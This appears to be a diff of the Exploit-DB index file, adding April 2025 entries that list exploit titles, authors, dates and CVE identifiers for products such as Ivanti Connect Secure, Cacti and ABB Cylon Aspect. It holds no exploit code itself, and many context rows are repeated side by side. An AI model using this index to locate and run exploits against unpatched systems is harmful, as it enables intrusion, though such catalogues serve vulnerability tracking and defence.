29439,exploits/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,remote,multiple,,2007-01-09,2013-11-04,1,CVE-2007-0183;OSVDB-32662,,,,,https://www.securityfocus.com/bid/21977/info 29439,exploits/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,remote,multiple,,2007-01-09,2013-11-04,1,CVE-2007-0183;OSVDB-32662,,,,,https://www.securityfocus.com/bid/21977/info
19749,exploits/multiple/remote/19749.txt,"ISC BIND 4.9.7/8.x - Traffic Amplification and NS Route Discovery",2000-02-14,Sebastian,remote,multiple,,2000-02-14,2012-07-16,1,,,,,,https://www.securityfocus.com/bid/983/info 19749,exploits/multiple/remote/19749.txt,"ISC BIND 4.9.7/8.x - Traffic Amplification and NS Route Discovery",2000-02-14,Sebastian,remote,multiple,,2000-02-14,2012-07-16,1,,,,,,https://www.securityfocus.com/bid/983/info
52213,exploits/multiple/remote/52213.py,"Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)",2025-04-15,"Abdualhadi khalifa",remote,multiple,,2025-04-15,2025-04-15,0,CVE-2025-0282,,,,,
50833,exploits/multiple/remote/50833.txt,"Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)",2022-03-22,d7x,remote,multiple,,2022-03-22,2022-03-23,0,CVE-2021-44529,,,,, 50833,exploits/multiple/remote/50833.txt,"Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)",2022-03-22,d7x,remote,multiple,,2022-03-22,2022-03-23,0,CVE-2021-44529,,,,,
20601,exploits/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal",2001-01-28,"MC GaN",remote,multiple,,2001-01-28,2012-08-17,1,CVE-2001-0253;OSVDB-498,,,,,https://www.securityfocus.com/bid/2314/info 20601,exploits/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal",2001-01-28,"MC GaN",remote,multiple,,2001-01-28,2012-08-17,1,CVE-2001-0253;OSVDB-498,,,,,https://www.securityfocus.com/bid/2314/info
4567,exploits/multiple/remote/4567.pl,"Jakarta Slide 2.1 RC1 - Remote File Disclosure",2007-10-24,kingcope,remote,multiple,,2007-10-23,2016-10-25,1,OSVDB-38673;CVE-2007-5731,,,,http://www.exploit-db.comjakarta-slide-server-bin-2.1.zip, 4567,exploits/multiple/remote/4567.pl,"Jakarta Slide 2.1 RC1 - Remote File Disclosure",2007-10-24,kingcope,remote,multiple,,2007-10-23,2016-10-25,1,OSVDB-38673;CVE-2007-5731,,,,http://www.exploit-db.comjakarta-slide-server-bin-2.1.zip,
@ -11673,6 +11682,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
33760,exploits/multiple/webapps/33760.txt,"(Multiple Products) - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,webapps,multiple,,2010-03-15,2014-06-15,1,,,,,,https://www.securityfocus.com/bid/38732/info 33760,exploits/multiple/webapps/33760.txt,"(Multiple Products) - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,webapps,multiple,,2010-03-15,2014-06-15,1,,,,,,https://www.securityfocus.com/bid/38732/info
52115,exploits/multiple/webapps/52115.NA,"ABB Cylon Aspect 3.07.02 - File Disclosure",2025-04-03,LiquidWorm,webapps,multiple,,2025-04-03,2025-04-13,0,CVE-na,,,,, 52115,exploits/multiple/webapps/52115.NA,"ABB Cylon Aspect 3.07.02 - File Disclosure",2025-04-03,LiquidWorm,webapps,multiple,,2025-04-03,2025-04-13,0,CVE-na,,,,,
52107,exploits/multiple/webapps/52107.NA,"ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)",2025-04-02,LiquidWorm,webapps,multiple,,2025-04-02,2025-04-13,0,CVE-2024-6298,,,,, 52107,exploits/multiple/webapps/52107.NA,"ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)",2025-04-02,LiquidWorm,webapps,multiple,,2025-04-02,2025-04-13,0,CVE-2024-6298,,,,,
52222,exploits/multiple/webapps/52222.txt,"ABB Cylon Aspect 3.08.03 (MapServicesHandler) - Authenticated Reflected XSS",2025-04-15,LiquidWorm,webapps,multiple,,2025-04-15,2025-04-15,0,,,,,,
52223,exploits/multiple/webapps/52223.txt,"ABB Cylon Aspect 3.08.03 - Hard-coded Secrets",2025-04-15,LiquidWorm,webapps,multiple,,2025-04-15,2025-04-15,0,,,,,,
43378,exploits/multiple/webapps/43378.py,"Ability Mail Server 3.3.2 - Cross-Site Scripting",2017-12-20,"Aloyce J. Makalanga",webapps,multiple,,2017-12-20,2017-12-20,0,CVE-2017-17752,,,,http://www.exploit-db.comams3.exe, 43378,exploits/multiple/webapps/43378.py,"Ability Mail Server 3.3.2 - Cross-Site Scripting",2017-12-20,"Aloyce J. Makalanga",webapps,multiple,,2017-12-20,2017-12-20,0,CVE-2017-17752,,,,http://www.exploit-db.comams3.exe,
49298,exploits/multiple/webapps/49298.txt,"Academy-LMS 4.3 - Stored XSS",2020-12-21,"Vinicius Alves",webapps,multiple,,2020-12-21,2022-06-03,0,,,,,, 49298,exploits/multiple/webapps/49298.txt,"Academy-LMS 4.3 - Stored XSS",2020-12-21,"Vinicius Alves",webapps,multiple,,2020-12-21,2022-06-03,0,,,,,,
49991,exploits/multiple/webapps/49991.txt,"Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)",2021-06-14,"Abdulazeez Alaseeri",webapps,multiple,,2021-06-14,2021-06-14,0,CVE-2021-34369,,,,, 49991,exploits/multiple/webapps/49991.txt,"Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)",2021-06-14,"Abdulazeez Alaseeri",webapps,multiple,,2021-06-14,2021-06-14,0,CVE-2021-34369,,,,,
@ -11680,6 +11691,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49990,exploits/multiple/webapps/49990.txt,"Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)",2021-06-14,"Abdulazeez Alaseeri",webapps,multiple,,2021-06-14,2021-06-14,0,CVE-2021-34370,,,,, 49990,exploits/multiple/webapps/49990.txt,"Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)",2021-06-14,"Abdulazeez Alaseeri",webapps,multiple,,2021-06-14,2021-06-14,0,CVE-2021-34370,,,,,
49113,exploits/multiple/webapps/49113.py,"Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF",2020-11-27,"Julien Ahrens",webapps,multiple,,2020-11-27,2020-11-27,0,CVE-2020-16171,,,,, 49113,exploits/multiple/webapps/49113.py,"Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF",2020-11-27,"Julien Ahrens",webapps,multiple,,2020-11-27,2020-11-27,0,CVE-2020-16171,,,,,
51221,exploits/multiple/webapps/51221.txt,"Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-03,"Sajibe Kanti",webapps,multiple,,2023-04-03,2023-04-03,0,,,,,, 51221,exploits/multiple/webapps/51221.txt,"Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-03,"Sajibe Kanti",webapps,multiple,,2023-04-03,2023-04-03,0,,,,,,
52208,exploits/multiple/webapps/52208.py,"Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)",2025-04-15,"Eui Chul Chung",webapps,multiple,,2025-04-15,2025-04-15,0,CVE-2024-50672,,,,,
45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,,2018-12-11,2018-12-11,0,CVE-2018-15961,,,,, 45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,,2018-12-11,2018-12-11,0,CVE-2018-15961,,,,,
40346,exploits/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",webapps,multiple,,2016-09-07,2016-09-07,1,CVE-2016-4264,,,,,http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt 40346,exploits/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",webapps,multiple,,2016-09-07,2016-09-07,1,CVE-2016-4264,,,,,http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt
51875,exploits/multiple/webapps/51875.py,"Adobe ColdFusion versions 2018_15 (and earlier) and 2021_5 and earlier - Arbitrary File Read",2024-03-11,"Youssef Muhammad",webapps,multiple,,2024-03-11,2024-03-11,0,,,,,, 51875,exploits/multiple/webapps/51875.py,"Adobe ColdFusion versions 2018_15 (and earlier) and 2021_5 and earlier - Arbitrary File Read",2024-03-11,"Youssef Muhammad",webapps,multiple,,2024-03-11,2024-03-11,0,,,,,,
@ -12005,6 +12017,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
32908,exploits/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",webapps,multiple,,2009-04-14,2014-04-16,1,CVE-2009-1334;OSVDB-53651,,,,,https://www.securityfocus.com/bid/34513/info 32908,exploits/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",webapps,multiple,,2009-04-14,2014-04-16,1,CVE-2009-1334;OSVDB-53651,,,,,https://www.securityfocus.com/bid/34513/info
32576,exploits/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection",2008-11-10,"Francesco Bianchino",webapps,multiple,,2008-11-10,2014-03-29,1,,,,,,https://www.securityfocus.com/bid/32233/info 32576,exploits/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection",2008-11-10,"Francesco Bianchino",webapps,multiple,,2008-11-10,2014-03-29,1,,,,,,https://www.securityfocus.com/bid/32233/info
17404,exploits/multiple/webapps/17404.txt,"IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery",2011-06-15,"Core Security",webapps,multiple,,2011-06-15,2011-06-15,1,CVE-2010-3271;OSVDB-73052,,,,,http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Finding_bugs_and_publishing_advisories 17404,exploits/multiple/webapps/17404.txt,"IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery",2011-06-15,"Core Security",webapps,multiple,,2011-06-15,2011-06-15,1,CVE-2010-3271;OSVDB-73052,,,,,http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Finding_bugs_and_publishing_advisories
52210,exploits/multiple/webapps/52210.txt,"IBMi Navigator 7.5 - HTTP Security Token Bypass",2025-04-15,hyp3rlinx,webapps,multiple,,2025-04-15,2025-04-15,0,CVE-2024-51464,,,,,
52212,exploits/multiple/webapps/52212.txt,"IBMi Navigator 7.5 - Server Side Request Forgery (SSRF)",2025-04-15,hyp3rlinx,webapps,multiple,,2025-04-15,2025-04-15,0,CVE-2024-51463,,,,,
52009,exploits/multiple/webapps/52009.txt,"iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)",2024-05-08,modrnProph3t,webapps,multiple,,2024-05-08,2024-05-08,0,,,,,, 52009,exploits/multiple/webapps/52009.txt,"iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)",2024-05-08,modrnProph3t,webapps,multiple,,2024-05-08,2024-05-08,0,,,,,,
49148,exploits/multiple/webapps/49148.txt,"ILIAS Learning Management System 4.3 - SSRF",2020-12-02,Dot,webapps,multiple,,2020-12-02,2020-12-02,0,,,,,, 49148,exploits/multiple/webapps/49148.txt,"ILIAS Learning Management System 4.3 - SSRF",2020-12-02,Dot,webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
10630,exploits/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login",2009-12-24,Sora,webapps,multiple,,2009-12-23,,1,,,,,, 10630,exploits/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login",2009-12-24,Sora,webapps,multiple,,2009-12-23,,1,,,,,,
@ -12253,6 +12267,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple,,2014-12-27,2014-12-27,0,OSVDB-116460,,,,, 35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple,,2014-12-27,2014-12-27,0,OSVDB-116460,,,,,
52193,exploits/multiple/webapps/52193.py,"Pimcore customer-data-framework 4.2.0 - SQL injection",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11956,,,,, 52193,exploits/multiple/webapps/52193.py,"Pimcore customer-data-framework 4.2.0 - SQL injection",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11956,,,,,
49519,exploits/multiple/webapps/49519.html,"Pixelimity 1.0 - 'password' Cross-Site Request Forgery",2021-02-03,Noth,webapps,multiple,,2021-02-03,2021-02-03,0,CVE-2020-23522,,,,, 49519,exploits/multiple/webapps/49519.html,"Pixelimity 1.0 - 'password' Cross-Site Request Forgery",2021-02-03,Noth,webapps,multiple,,2021-02-03,2021-02-03,0,CVE-2020-23522,,,,,
52211,exploits/multiple/webapps/52211.txt,"Plane 0.23.1 - Server side request forgery (SSRF)",2025-04-15,"Saud Alenazi",webapps,multiple,,2025-04-15,2025-04-15,0,,,,,,
50426,exploits/multiple/webapps/50426.txt,"Plastic SCM 10.0.16.5622 - WebAdmin Server Access",2021-10-18,"Basavaraj Banakar",webapps,multiple,,2021-10-18,2021-10-18,0,CVE-2021-41382,,,,, 50426,exploits/multiple/webapps/50426.txt,"Plastic SCM 10.0.16.5622 - WebAdmin Server Access",2021-10-18,"Basavaraj Banakar",webapps,multiple,,2021-10-18,2021-10-18,0,CVE-2021-41382,,,,,
34136,exploits/multiple/webapps/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Local File Inclusion",2010-06-21,"Pouya Daneshmand",webapps,multiple,,2010-06-21,2014-07-22,1,,,,,,https://www.securityfocus.com/bid/40813/info 34136,exploits/multiple/webapps/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Local File Inclusion",2010-06-21,"Pouya Daneshmand",webapps,multiple,,2010-06-21,2014-07-22,1,,,,,,https://www.securityfocus.com/bid/40813/info
31983,exploits/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",webapps,multiple,32400,2014-02-28,2014-02-28,0,OSVDB-103861;OSVDB-103841;OSVDB-103840;OSVDB-103839;CVE-2014-9304;CVE-2014-9181,,,,, 31983,exploits/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",webapps,multiple,32400,2014-02-28,2014-02-28,0,OSVDB-103861;OSVDB-103841;OSVDB-103840;OSVDB-103839;CVE-2014-9304;CVE-2014-9181,,,,,
@ -13028,6 +13043,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",2021-04-27,"Dolev Farhi",dos,php,,2021-04-27,2021-10-29,0,,,,,, 49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",2021-04-27,"Dolev Farhi",dos,php,,2021-04-27,2021-10-29,0,,,,,,
1345,exploits/php/dos/1345.php,"Xaraya 1.0.0 RC4 - 'create()' Denial of Service",2005-11-29,rgod,dos,php,,2005-11-28,2016-06-13,1,OSVDB-21249;CVE-2005-3929,,,,http://www.exploit-db.comxaraya-1.0-core.zip, 1345,exploits/php/dos/1345.php,"Xaraya 1.0.0 RC4 - 'create()' Denial of Service",2005-11-29,rgod,dos,php,,2005-11-28,2016-06-13,1,OSVDB-21249;CVE-2005-3929,,,,http://www.exploit-db.comxaraya-1.0-core.zip,
44336,exploits/php/dos/44336.py,"XenForo 2 - CSS Loader Denial of Service",2018-03-23,LockedByte,dos,php,,2018-03-23,2018-03-23,0,,"Denial of Service (DoS)",,,, 44336,exploits/php/dos/44336.py,"XenForo 2 - CSS Loader Denial of Service",2018-03-23,LockedByte,dos,php,,2018-03-23,2018-03-23,0,,"Denial of Service (DoS)",,,,
52218,exploits/php/hardware/52218.txt,"ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,CVE-2024-48844,,,,,
52219,exploits/php/hardware/52219.txt,"ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,,,,,,
13768,exploits/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2010-06-08,mr_me,local,php,,2010-06-07,2017-07-19,1,,,,http://www.exploit-db.com/screenshots/idlt14000/screen-shot-2011-01-07-at-113530-pm.png,http://www.exploit-db.comCastRipper.exe, 13768,exploits/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2010-06-08,mr_me,local,php,,2010-06-07,2017-07-19,1,,,,http://www.exploit-db.com/screenshots/idlt14000/screen-shot-2011-01-07-at-113530-pm.png,http://www.exploit-db.comCastRipper.exe,
28504,exploits/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",local,php,,2006-09-09,2016-12-02,1,CVE-2006-4625;OSVDB-29603,,,,http://www.exploit-db.comphp-4.4.4.tar.gz,https://www.securityfocus.com/bid/19933/info 28504,exploits/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",local,php,,2006-09-09,2016-12-02,1,CVE-2006-4625;OSVDB-29603,,,,http://www.exploit-db.comphp-4.4.4.tar.gz,https://www.securityfocus.com/bid/19933/info
21347,exploits/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File open_basedir Circumvention",2002-03-17,Tozz,local,php,,2002-03-17,2016-12-02,1,CVE-2002-0484;OSVDB-5282,,,,http://www.exploit-db.comphp-4.1.2.tar.gz,https://www.securityfocus.com/bid/4325/info 21347,exploits/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File open_basedir Circumvention",2002-03-17,Tozz,local,php,,2002-03-17,2016-12-02,1,CVE-2002-0484;OSVDB-5282,,,,http://www.exploit-db.comphp-4.1.2.tar.gz,https://www.securityfocus.com/bid/4325/info
@ -15462,6 +15479,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
33374,exploits/php/webapps/33374.txt,"Cacti 0.8.x - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-21,"Moritz Naumann",webapps,php,,2009-11-21,2014-05-16,1,CVE-2009-4032;OSVDB-60566,,,,http://www.exploit-db.comcacti-0.8.7e.zip,https://www.securityfocus.com/bid/37109/info 33374,exploits/php/webapps/33374.txt,"Cacti 0.8.x - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-21,"Moritz Naumann",webapps,php,,2009-11-21,2014-05-16,1,CVE-2009-4032;OSVDB-60566,,,,http://www.exploit-db.comcacti-0.8.7e.zip,https://www.securityfocus.com/bid/37109/info
49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection",2021-04-29,"Leonardo Paiva",webapps,php,,2021-04-29,2021-10-29,0,CVE-2020-14295,,,,, 49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection",2021-04-29,"Leonardo Paiva",webapps,php,,2021-04-29,2021-10-29,0,CVE-2020-14295,,,,,
51740,exploits/php/webapps/51740.txt,"Cacti 1.2.24 - Authenticated command injection when using SNMP options",2023-10-09,"Antonio Francesco Sardella",webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-39362,,,,, 51740,exploits/php/webapps/51740.txt,"Cacti 1.2.24 - Authenticated command injection when using SNMP options",2023-10-09,"Antonio Francesco Sardella",webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-39362,,,,,
52225,exploits/php/webapps/52225.txt,"Cacti 1.2.26 - Remote Code Execution (RCE) (Authenticated)",2025-04-15,D3Ext,webapps,php,,2025-04-15,2025-04-15,0,CVE-2024-25641,,,,,
48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,,2020-02-24,2020-02-24,0,,,,,, 48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,,2020-02-24,2020-02-24,0,,,,,,
33809,exploits/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,webapps,php,,2014-06-18,2014-06-21,1,CVE-2014-4644;OSVDB-108452,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-06-21-at-102309.png,http://www.exploit-db.comsuperlinks-v1.4-2.tgz, 33809,exploits/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,webapps,php,,2014-06-18,2014-06-21,1,CVE-2014-4644;OSVDB-108452,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-06-21-at-102309.png,http://www.exploit-db.comsuperlinks-v1.4-2.tgz,
35578,exploits/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,webapps,php,,2014-12-19,2016-10-24,0,CVE-2014-4644;OSVDB-108452,,,,http://www.exploit-db.comsuperlinks-v1.4-2.tgz, 35578,exploits/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,webapps,php,,2014-12-19,2016-10-24,0,CVE-2014-4644;OSVDB-108452,,,,http://www.exploit-db.comsuperlinks-v1.4-2.tgz,
@ -25363,6 +25381,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51995,exploits/php/webapps/51995.md,"OpenClinic GA 5.247.01 - Path Traversal (Authenticated)",2024-04-15,VB,webapps,php,,2024-04-15,2024-04-15,0,CVE-2023-40279,,,,, 51995,exploits/php/webapps/51995.md,"OpenClinic GA 5.247.01 - Path Traversal (Authenticated)",2024-04-15,VB,webapps,php,,2024-04-15,2024-04-15,0,CVE-2023-40279,,,,,
44391,exploits/php/webapps/44391.html,"OpenCMS 10.5.3 - Cross-Site Request Forgery",2018-04-02,"Sureshbabu Narvaneni",webapps,php,,2018-04-02,2018-04-02,0,CVE-2018-8811,,,,, 44391,exploits/php/webapps/44391.html,"OpenCMS 10.5.3 - Cross-Site Request Forgery",2018-04-02,"Sureshbabu Narvaneni",webapps,php,,2018-04-02,2018-04-02,0,CVE-2018-8811,,,,,
44392,exploits/php/webapps/44392.txt,"OpenCMS 10.5.3 - Cross-Site Scripting",2018-04-02,"Sureshbabu Narvaneni",webapps,php,,2018-04-02,2018-04-02,0,CVE-2018-8815,,,,, 44392,exploits/php/webapps/44392.txt,"OpenCMS 10.5.3 - Cross-Site Scripting",2018-04-02,"Sureshbabu Narvaneni",webapps,php,,2018-04-02,2018-04-02,0,CVE-2018-8815,,,,,
52209,exploits/php/webapps/52209.txt,"OpenCMS 17.0 - Stored Cross Site Scripting (XSS)",2025-04-15,"Siddhartha Naik",webapps,php,,2025-04-15,2025-04-15,0,CVE-2024-41947,,,,,
12396,exploits/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Inclusion",2010-04-26,cr4wl3r,webapps,php,,2010-04-25,,1,OSVDB-64211;CVE-2010-1936,,,,http://www.exploit-db.comopenmairie_cominterne_1.01.zip, 12396,exploits/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Inclusion",2010-04-26,cr4wl3r,webapps,php,,2010-04-25,,1,OSVDB-64211;CVE-2010-1936,,,,http://www.exploit-db.comopenmairie_cominterne_1.01.zip,
18820,exploits/php/webapps/18820.php,"OpenConf 4.11 - '/author/edit.php' Blind SQL Injection",2012-05-02,EgiX,webapps,php,,2012-05-02,2012-05-02,1,CVE-2012-1002;OSVDB-78996,,,http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-05-02-at-100834-am.png,http://www.exploit-db.comopenconf-4.11.zip, 18820,exploits/php/webapps/18820.php,"OpenConf 4.11 - '/author/edit.php' Blind SQL Injection",2012-05-02,EgiX,webapps,php,,2012-05-02,2012-05-02,1,CVE-2012-1002;OSVDB-78996,,,http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-05-02-at-100834-am.png,http://www.exploit-db.comopenconf-4.11.zip,
20347,exploits/php/webapps/20347.txt,"Openconstructor CMS 3.12.0 - 'id' Multiple SQL Injections",2012-08-08,"Lorenzo Cantoni",webapps,php,,2012-08-08,2012-08-08,0,CVE-2012-3873;OSVDB-85131,,,,http://www.exploit-db.comopenconstructor-3.12.0.zip, 20347,exploits/php/webapps/20347.txt,"Openconstructor CMS 3.12.0 - 'id' Multiple SQL Injections",2012-08-08,"Lorenzo Cantoni",webapps,php,,2012-08-08,2012-08-08,0,CVE-2012-3873;OSVDB-85131,,,,http://www.exploit-db.comopenconstructor-3.12.0.zip,
@ -29009,6 +29028,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43239,exploits/php/webapps/43239.txt,"Realestate Crowdfunding Script 2.7.2 - 'pid' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,,2017-12-08,2017-12-13,1,CVE-2017-17591,"SQL Injection (SQLi)",,,, 43239,exploits/php/webapps/43239.txt,"Realestate Crowdfunding Script 2.7.2 - 'pid' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,,2017-12-08,2017-12-13,1,CVE-2017-17591,"SQL Injection (SQLi)",,,,
9313,exploits/php/webapps/9313.txt,"Really Simple CMS 0.3a - 'PT' Local File Inclusion",2009-07-30,SirGod,webapps,php,,2009-07-29,2016-11-14,1,OSVDB-57153;CVE-2009-2792,,,,http://www.exploit-db.comRSCMS.zip, 9313,exploits/php/webapps/9313.txt,"Really Simple CMS 0.3a - 'PT' Local File Inclusion",2009-07-30,SirGod,webapps,php,,2009-07-29,2016-11-14,1,OSVDB-57153;CVE-2009-2792,,,,http://www.exploit-db.comRSCMS.zip,
3641,exploits/php/webapps/3641.txt,"Really Simple PHP and Ajax (RSPA) 2007-03-23 - Remote File Inclusion",2007-04-02,"Hamid Ebadi",webapps,php,,2007-04-01,,1,OSVDB-34656;CVE-2007-1982;OSVDB-34655;CVE-2007-1851;OSVDB-34654;OSVDB-34653,,,,,http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6 3641,exploits/php/webapps/3641.txt,"Really Simple PHP and Ajax (RSPA) 2007-03-23 - Remote File Inclusion",2007-04-02,"Hamid Ebadi",webapps,php,,2007-04-01,,1,OSVDB-34656;CVE-2007-1982;OSVDB-34655;CVE-2007-1851;OSVDB-34654;OSVDB-34653,,,,,http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6
52207,exploits/php/webapps/52207.py,"Really Simple Security 9.1.1.1 - Authentication Bypass",2025-04-15,"Antonio Francesco Sardella",webapps,php,,2025-04-15,2025-04-15,0,CVE-2024-10924,,,,,
5766,exploits/php/webapps/5766.txt,"realm CMS 2.3 - Multiple Vulnerabilities",2008-06-09,BugReport.IR,webapps,php,,2008-06-08,,1,OSVDB-46056;CVE-2008-2682;OSVDB-46055;CVE-2008-2681;OSVDB-46054;CVE-2008-2680;OSVDB-46053;CVE-2008-2679,,,,,http://bugreport.ir/index.php?/40 5766,exploits/php/webapps/5766.txt,"realm CMS 2.3 - Multiple Vulnerabilities",2008-06-09,BugReport.IR,webapps,php,,2008-06-08,,1,OSVDB-46056;CVE-2008-2682;OSVDB-46055;CVE-2008-2681;OSVDB-46054;CVE-2008-2680;OSVDB-46053;CVE-2008-2679,,,,,http://bugreport.ir/index.php?/40
17206,exploits/php/webapps/17206.txt,"Realmarketing CMS - Multiple SQL Injections",2011-04-22,^Xecuti0N3r,webapps,php,,2011-04-22,2011-04-22,1,,,,,, 17206,exploits/php/webapps/17206.txt,"Realmarketing CMS - Multiple SQL Injections",2011-04-22,^Xecuti0N3r,webapps,php,,2011-04-22,2011-04-22,1,,,,,,
7743,exploits/php/webapps/7743.txt,"Realtor 747 - 'define.php?INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,webapps,php,,2009-01-11,,1,OSVDB-51315;CVE-2009-0495,,,,, 7743,exploits/php/webapps/7743.txt,"Realtor 747 - 'define.php?INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,webapps,php,,2009-01-11,,1,OSVDB-51315;CVE-2009-0495,,,,,
@ -35083,6 +35103,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
